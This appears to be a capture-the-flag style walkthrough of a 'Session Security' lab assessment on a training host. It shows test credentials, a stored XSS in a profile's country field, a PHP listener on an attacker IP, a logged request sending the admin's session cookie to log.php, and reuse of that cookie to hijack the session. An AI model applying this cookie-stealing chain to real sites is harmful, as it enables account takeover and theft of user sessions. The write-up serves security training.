Session Security

Skills Assessment

Test account credentials:

Email: heavycat106
Password: rocknrol

Create a log.php script to capture the cookie of user upon logging in to user public profile.

Perform XXS injection on the different input fields like county name phone and see which one is vulnerable to XXS.

Country input field is vulnerable to XSS injection

Click save and share

Usercookie:s%3Azgj5CVxjAQfFn87UYr_TMS71EcFqp4rO.KtaGjIBaYnO8yi6zU79xydo665QMnxqIW629bLzoBF0

Now we can use the API endpoint to make the Administrator visit public profile URL. http://minilab.htb.net/profile?email=julie.rogers@example.com

/submit-solution is the API endpoint as discussed at the start of the assessment

http://minilab.htb.net/submit-solution

To make admin visit url, key in the URL of the public profile Julie rogers to the URL parameter of the API endpoint with a PHP server running on port 8000

https://minilab.htb.net/submit-solution?url=http://minilab.htb.net/profile?email=julie.rogers@example.com

php -S 10.10.14.99:8000

GET /log.php?c=auth-session=s%3ADVBJKWUHWFsbsK_awzzui_EXuEyaQkUe.hLIQRFaEQFekQZoq2le6Wa%2Bd6fRVh%2FVxMRr%2B6iqFRa8

Admin session cookie:s:DVBJKWUHWFsbsK_awzzui_EXuEyaQkUe.hLIQRFaEQFekQZoq2le6Wa+d6fRVh/VxMRr+6iqFRa8

Use that cookie in current session via developer tools after URL decode

PreviousNotes NextXSS

Last updated 3 months ago